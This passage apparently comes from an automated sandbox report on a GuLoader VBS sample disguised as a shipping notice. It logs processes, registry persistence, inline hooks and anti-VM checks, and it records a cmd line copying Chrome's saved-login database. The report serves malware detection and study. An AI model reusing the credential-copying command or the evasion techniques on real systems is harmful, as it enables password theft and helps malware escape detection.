IAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYwJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.cmdlineJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC6A9.tmp" "c:\Users\user\AppData\Local\Temp\r0st5wfi\CSC6C14E777B6F1436A823D509EAA82CA50.TMP"Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220822Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqhyesjp.mvq.ps1Jump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@21/15@14/10
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs"
      Source: C:\Windows\SysWOW64\wscript.exeFile written: C:\Users\user\AppData\Roaming\O228O718\O22logri.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Binary string: ieinstal.pdbGCTL source: wscript.exe, 0000000A.00000002.28718231919.0000000000488000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28744695582.0000000004C7F000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000F.00000000.25843897827.000000003447F000.00000004.80000000.00040000.00000000.sdmp
      Source: Binary string: wscript.pdbGCTL source: ieinstal.exe, 00000007.00000002.25361078586.000000001E300000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000007.00000003.25328550602.000000001E4A1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: ieinstal.pdb source: wscript.exe, 0000000A.00000002.28718231919.0000000000488000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28744695582.0000000004C7F000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000F.00000000.25843897827.000000003447F000.00000004.80000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000007.00000003.24880128513.000000001E478000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24868071525.000000001E2D0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25334031919.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28741585528.000000000485D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25342803279.000000000458A000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28733198562.0000000004730000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000007.00000003.24880128513.000000001E478000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000003.24868071525.000000001E2D0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25334031919.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28741585528.000000000485D000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25342803279.000000000458A000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.28733198562.0000000004730000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wscript.pdb source: ieinstal.exe, 00000007.00000002.25361078586.000000001E300000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000007.00000003.25328550602.000000001E4A1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: firefox.pdb source: wscript.exe, 0000000A.00000003.25837285636.000000000586D000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.25899727561.000000000591A000.00000004.00000800.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000007.00000000.24736277326.0000000000630000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04B2115F push es; ret 3_2_04B21160
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08193907 push cs; retn 0007h3_2_08193932
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083DA807 push 88F8082Fh; retf 5506h3_2_083DA816
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_087029B0 push eax; ret 3_2_087029B1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08716A00 push es; ret 3_2_08716A18
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6508CD push ecx; mov dword ptr [esp], ecx7_2_1E6508D6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6297A1 push es; iretd 7_2_1E6297A8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6221AD pushad ; retf 0004h7_2_1E62223F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.cmdlineJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.dllJump to dropped file
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5JULP2EXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5JULP2EXJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE9
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Windows\explorer.exe TID: 2716Thread sleep time: -130000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exe TID: 6204Thread sleep time: -144000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.dllJump to dropped file
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CCE40 rdtsc 7_2_1E6CCE40
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8990Jump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeAPI coverage: 1.1 %
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
      Source: powershell.exe, 00000003.00000002.25229914450.000000000B229000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000007.00000002.25343582867.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: explorer.exe, 00000008.00000000.24996281461.0000000010F10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCLEXVQFKTVHBNBFDIGBWCYIUFTYNXWINQROSYCHWXJCKPZYNZLVOOVLNCNYKQIGXRQCFJUHBKWMQUCASVTPDLYLDZRVIWXLMRUAQKCYBOEMFYUVWQKXHFUCRYJBPUBOAKKNPWARETAPJJXXUOZULUTXCQPITHNBBWWEVUTWUDRKHYDDUSHQBLIWFLPWKDUYIYTYIQKEJIOBLWDOVSETUWADBWGNDFUUJEJSRJWXWGHFPXTHUELZYPRJPNJUKSYQVDCDFZEEZLSYFNQOKCJRMASCJPYPWDPGJXUCDHEZMPLPVMCIBRIQFHGRLCNFONUMPWNQEUIWWQDYBHRVPAZEHOEYJYYTSUXKIGVO
